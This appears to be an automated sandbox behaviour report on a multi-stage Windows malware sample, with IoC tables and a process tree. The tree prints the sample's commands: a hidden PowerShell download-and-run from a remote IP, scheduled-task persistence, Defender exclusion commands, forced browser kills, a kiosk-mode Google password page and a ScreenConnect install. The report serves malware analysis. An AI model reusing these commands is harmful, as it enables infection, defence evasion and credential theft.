| Token: SeIncreaseQuotaPrivilege | 3912 | msiexec.exe |
| Token: SeMachineAccountPrivilege | 3912 | msiexec.exe |
| Token: SeTcbPrivilege | 3912 | msiexec.exe |
| Token: SeSecurityPrivilege | 3912 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 3912 | msiexec.exe |
| Token: SeLoadDriverPrivilege | 3912 | msiexec.exe |
| Token: SeSystemProfilePrivilege | 3912 | msiexec.exe |
| Token: SeSystemtimePrivilege | 3912 | msiexec.exe |
| Token: SeProfSingleProcessPrivilege | 3912 | msiexec.exe |
| Token: SeIncBasePriorityPrivilege | 3912 | msiexec.exe |
| Token: SeCreatePagefilePrivilege | 3912 | msiexec.exe |
| Token: SeCreatePermanentPrivilege | 3912 | msiexec.exe |
| Token: SeBackupPrivilege | 3912 | msiexec.exe |
| Token: SeRestorePrivilege | 3912 | msiexec.exe |
| Token: SeShutdownPrivilege | 3912 | msiexec.exe |
| Token: SeDebugPrivilege | 3912 | msiexec.exe |
| Token: SeAuditPrivilege | 3912 | msiexec.exe |
| Token: SeSystemEnvironmentPrivilege | 3912 | msiexec.exe |
| Token: SeChangeNotifyPrivilege | 3912 | msiexec.exe |

Suspicious use of FindShellTrayWindow 47 IoCs

| pid | Process |
| --- | --- |
| 3060 | 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe |
| 3060 | 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe |
| 3060 | 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe |
| 2992 | TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 1784 | 75c64a5fe4.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 1784 | 75c64a5fe4.exe |
| 1784 | 75c64a5fe4.exe |
| 1784 | 75c64a5fe4.exe |
| 1784 | 75c64a5fe4.exe |
| 1784 | 75c64a5fe4.exe |
| 1704 | firefox.exe |
| 1704 | firefox.exe |
| 1704 | firefox.exe |
| 1704 | firefox.exe |
| 1784 | 75c64a5fe4.exe |
| 1784 | 75c64a5fe4.exe |
| 1784 | 75c64a5fe4.exe |
| 1784 | 75c64a5fe4.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 3912 | msiexec.exe |

Suspicious use of SendNotifyMessage 36 IoCs

| pid | Process |
| --- | --- |
| 3060 | 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe |
| 3060 | 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe |
| 3060 | 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 2236 | explorer.exe |
| 1784 | 75c64a5fe4.exe |
| 1784 | 75c64a5fe4.exe |
| 1784 | 75c64a5fe4.exe |
| 1784 | 75c64a5fe4.exe |
| 1784 | 75c64a5fe4.exe |
| 1784 | 75c64a5fe4.exe |
| 1704 | firefox.exe |
| 1704 | firefox.exe |
| 1704 | firefox.exe |
| 1784 | 75c64a5fe4.exe |
| 1784 | 75c64a5fe4.exe |
| 1784 | 75c64a5fe4.exe |
| 1784 | 75c64a5fe4.exe |

Suspicious use of SetWindowsHookEx 1 IoCs

| pid | Process |
| --- | --- |
| 2956 | NP4kBrG.exe |

Suspicious use of WriteProcessMemory 64 IoCs

| description | pid | Process | procid_target |
| --- | --- | --- | --- |
| PID 3060 wrote to memory of 1736 | 3060 | 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 30 |
| PID 3060 wrote to memory of 1736 | 3060 | 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 30 |
| PID 3060 wrote to memory of 1736 | 3060 | 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 30 |
| PID 3060 wrote to memory of 1736 | 3060 | 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 30 |
| PID 3060 wrote to memory of 2408 | 3060 | 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 31 |
| PID 3060 wrote to memory of 2408 | 3060 | 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 31 |
| PID 3060 wrote to memory of 2408 | 3060 | 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 31 |
| PID 3060 wrote to memory of 2408 | 3060 | 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 31 |
| PID 1736 wrote to memory of 2340 | 1736 | cmd.exe | 33 |
| PID 1736 wrote to memory of 2340 | 1736 | cmd.exe | 33 |
| PID 1736 wrote to memory of 2340 | 1736 | cmd.exe | 33 |
| PID 1736 wrote to memory of 2340 | 1736 | cmd.exe | 33 |
| PID 2408 wrote to memory of 2328 | 2408 | mshta.exe | 34 |
| PID 2408 wrote to memory of 2328 | 2408 | mshta.exe | 34 |
| PID 2408 wrote to memory of 2328 | 2408 | mshta.exe | 34 |
| PID 2408 wrote to memory of 2328 | 2408 | mshta.exe | 34 |
| PID 2328 wrote to memory of 2992 | 2328 | powershell.exe | 36 |
| PID 2328 wrote to memory of 2992 | 2328 | powershell.exe | 36 |
| PID 2328 wrote to memory of 2992 | 2328 | powershell.exe | 36 |
| PID 2328 wrote to memory of 2992 | 2328 | powershell.exe | 36 |
| PID 2992 wrote to memory of 1756 | 2992 | TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE | 37 |
| PID 2992 wrote to memory of 1756 | 2992 | TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE | 37 |
| PID 2992 wrote to memory of 1756 | 2992 | TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE | 37 |
| PID 2992 wrote to memory of 1756 | 2992 | TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE | 37 |
| PID 1756 wrote to memory of 2956 | 1756 | rapes.exe | 40 |
| PID 1756 wrote to memory of 2956 | 1756 | rapes.exe | 40 |
| PID 1756 wrote to memory of 2956 | 1756 | rapes.exe | 40 |
| PID 1756 wrote to memory of 2956 | 1756 | rapes.exe | 40 |
| PID 2956 wrote to memory of 2064 | 2956 | NP4kBrG.exe | 41 |
| PID 2956 wrote to memory of 2064 | 2956 | NP4kBrG.exe | 41 |
| PID 2956 wrote to memory of 2064 | 2956 | NP4kBrG.exe | 41 |
| PID 2956 wrote to memory of 1384 | 2956 | NP4kBrG.exe | 43 |
| PID 2956 wrote to memory of 1384 | 2956 | NP4kBrG.exe | 43 |
| PID 2956 wrote to memory of 1384 | 2956 | NP4kBrG.exe | 43 |
| PID 2956 wrote to memory of 956 | 2956 | NP4kBrG.exe | 45 |
| PID 2956 wrote to memory of 956 | 2956 | NP4kBrG.exe | 45 |
| PID 2956 wrote to memory of 956 | 2956 | NP4kBrG.exe | 45 |
| PID 2956 wrote to memory of 844 | 2956 | NP4kBrG.exe | 47 |
| PID 2956 wrote to memory of 844 | 2956 | NP4kBrG.exe | 47 |
| PID 2956 wrote to memory of 844 | 2956 | NP4kBrG.exe | 47 |
| PID 2956 wrote to memory of 1952 | 2956 | NP4kBrG.exe | 49 |
| PID 2956 wrote to memory of 1952 | 2956 | NP4kBrG.exe | 49 |
| PID 2956 wrote to memory of 1952 | 2956 | NP4kBrG.exe | 49 |
| PID 1756 wrote to memory of 2672 | 1756 | rapes.exe | 54 |
| PID 1756 wrote to memory of 2672 | 1756 | rapes.exe | 54 |
| PID 1756 wrote to memory of 2672 | 1756 | rapes.exe | 54 |
| PID 1756 wrote to memory of 2672 | 1756 | rapes.exe | 54 |
| PID 1756 wrote to memory of 2176 | 1756 | rapes.exe | 55 |
| PID 1756 wrote to memory of 2176 | 1756 | rapes.exe | 55 |
| PID 1756 wrote to memory of 2176 | 1756 | rapes.exe | 55 |
| PID 1756 wrote to memory of 2176 | 1756 | rapes.exe | 55 |
| PID 2156 wrote to memory of 1996 | 2156 | taskeng.exe | 57 |
| PID 2156 wrote to memory of 1996 | 2156 | taskeng.exe | 57 |
| PID 2156 wrote to memory of 1996 | 2156 | taskeng.exe | 57 |
| PID 1756 wrote to memory of 1784 | 1756 | rapes.exe | 58 |
| PID 1756 wrote to memory of 1784 | 1756 | rapes.exe | 58 |
| PID 1756 wrote to memory of 1784 | 1756 | rapes.exe | 58 |
| PID 1756 wrote to memory of 1784 | 1756 | rapes.exe | 58 |
| PID 1784 wrote to memory of 2492 | 1784 | 75c64a5fe4.exe | 59 |
| PID 1784 wrote to memory of 2492 | 1784 | 75c64a5fe4.exe | 59 |
| PID 1784 wrote to memory of 2492 | 1784 | 75c64a5fe4.exe | 59 |
| PID 1784 wrote to memory of 2492 | 1784 | 75c64a5fe4.exe | 59 |
| PID 1784 wrote to memory of 1692 | 1784 | 75c64a5fe4.exe | 61 |
| PID 1784 wrote to memory of 1692 | 1784 | 75c64a5fe4.exe | 61 |

Uses Task Scheduler COM API 1 TTPs

The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API

The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

Level 1: C:\Users\Admin\AppData\Local\Temp\2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
  PID: 3060
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c schtasks /create /tn 5ri88maP28C /tr "mshta C:\Users\Admin\AppData\Local\Temp\Qd8riT38L.hta" /sc minute /mo 25 /ru "Admin" /f
    PID: 1736
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    Level 3: C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /create /tn 5ri88maP28C /tr "mshta C:\Users\Admin\AppData\Local\Temp\Qd8riT38L.hta" /sc minute /mo 25 /ru "Admin" /f
      PID: 2340
      - System Location Discovery: System Language Discovery
      - Scheduled Task/Job: Scheduled Task

  Level 2: C:\Windows\SysWOW64\mshta.exe
    Command line: mshta C:\Users\Admin\AppData\Local\Temp\Qd8riT38L.hta
    PID: 2408
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory

    Level 3: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
      PID: 2328
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Downloads MZ/PE file
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      Level 4: C:\Users\Admin\AppData\Local\TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE
        Command line: "C:\Users\Admin\AppData\Local\TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE"
        PID: 2992
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Loads dropped DLL
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Drops file in Windows directory
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory

        Level 5: C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          - Identifies VirtualBox via ACPI registry values (likely anti-VM)
          - Downloads MZ/PE file
          - Checks BIOS information in registry
          - Executes dropped EXE
          - Identifies Wine through registry keys
          - Loads dropped DLL
          - Adds Run key to start application
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe"C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe"6⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NP4kBrG.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\smss.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'smss.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:844
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "smss" /tr "C:\Users\Admin\AppData\Local\Temp\smss.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:1952
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381450101\9c32fb17b4.exe"C:\Users\Admin\AppData\Local\Temp\10381450101\9c32fb17b4.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2672
-
-
C:\Users\Admin\AppData\Local\Temp\10381460101\0eb65cfefc.exe"C:\Users\Admin\AppData\Local\Temp\10381460101\0eb65cfefc.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2176
-
-
C:\Users\Admin\AppData\Local\Temp\10381470101\75c64a5fe4.exe"C:\Users\Admin\AppData\Local\Temp\10381470101\75c64a5fe4.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:392
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:2348
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1704 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.0.1495202775\702543554" -parentBuildID 20221007134813 -prefsHandle 1272 -prefMapHandle 1260 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1defe146-567b-4be4-841f-f8fd9f4fce5f} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 1368 45f2758 gpu9⤵PID:1800
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.1.164726948\339993801" -parentBuildID 20221007134813 -prefsHandle 1520 -prefMapHandle 1516 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ef59b93c-a630-4af4-b6e9-02233eb89de0} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 1532 44fb458 socket9⤵PID:568
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.2.71304211\1123630119" -childID 1 -isForBrowser -prefsHandle 1892 -prefMapHandle 1888 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6320b6e7-54ff-4297-8a30-f35650186033} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 1868 18e4f558 tab9⤵PID:2592
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.3.242283499\1856710447" -childID 2 -isForBrowser -prefsHandle 2740 -prefMapHandle 2736 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b800ee98-7bb0-4cb0-8a77-959133ce9a3f} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 2752 e64558 tab9⤵PID:2996
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.4.855048009\1879785595" -childID 3 -isForBrowser -prefsHandle 3812 -prefMapHandle 3808 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0aafb9d-fdde-4b67-ab73-6dc3b0d77f50} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 3824 1eeb9e58 tab9⤵PID:564
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.5.1251832731\127858260" -childID 4 -isForBrowser -prefsHandle 3932 -prefMapHandle 3936 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d2d8319-a3fd-4b52-8746-d50862ecfd6b} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 3920 1eeb9858 tab9⤵PID:1412
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.6.1973818061\1873793797" -childID 5 -isForBrowser -prefsHandle 4112 -prefMapHandle 4116 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {58f77f72-5461-4a0e-b4f4-e19890cf6b35} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 4100 1ef9ab58 tab9⤵PID:1384
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381480101\9d780b6f18.exe"C:\Users\Admin\AppData\Local\Temp\10381480101\9d780b6f18.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3352
-
-
C:\Users\Admin\AppData\Local\Temp\10381490101\78577724d0.exe"C:\Users\Admin\AppData\Local\Temp\10381490101\78577724d0.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3624
-
-
C:\Users\Admin\AppData\Local\Temp\10381500101\d22426bcf1.exe"C:\Users\Admin\AppData\Local\Temp\10381500101\d22426bcf1.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3880
-
-
C:\Users\Admin\AppData\Local\Temp\10381510101\532fd2aeef.exe"C:\Users\Admin\AppData\Local\Temp\10381510101\532fd2aeef.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2088 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10381510101\532fd2aeef.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1700
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381520101\a4bb584db7.exe"C:\Users\Admin\AppData\Local\Temp\10381520101\a4bb584db7.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3848 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10381520101\a4bb584db7.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3688
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381530101\70d75e69ad.exe"C:\Users\Admin\AppData\Local\Temp\10381530101\70d75e69ad.exe"6⤵
- Executes dropped EXE
PID:3180 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3180 -s 647⤵
- Loads dropped DLL
PID:3216
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381540101\4aa41be87a.exe"C:\Users\Admin\AppData\Local\Temp\10381540101\4aa41be87a.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3368
-
-
C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe"C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3864 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"7⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3912
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe"6⤵PID:936
-
-
-
-
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2236
-
C:\Windows\system32\taskeng.exetaskeng.exe {ACAFAF6F-9758-4683-BA43-61C573FFBF3B} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Users\Admin\AppData\Local\Temp\smss.exeC:\Users\Admin\AppData\Local\Temp\smss.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Users\Admin\AppData\Local\Temp\smss.exeC:\Users\Admin\AppData\Local\Temp\smss.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:3920 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C1A7DC85C0D0DE76A5B67DE9BA51B217 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3676 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIC69A.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259573448 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3740
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 710C335EDB53381774964B0F5FF8D0CE2⤵PID:1020
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DB8C4DC25386892C1B9CF4859F2436E1 M Global\MSI00002⤵PID:3864
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:1744
-
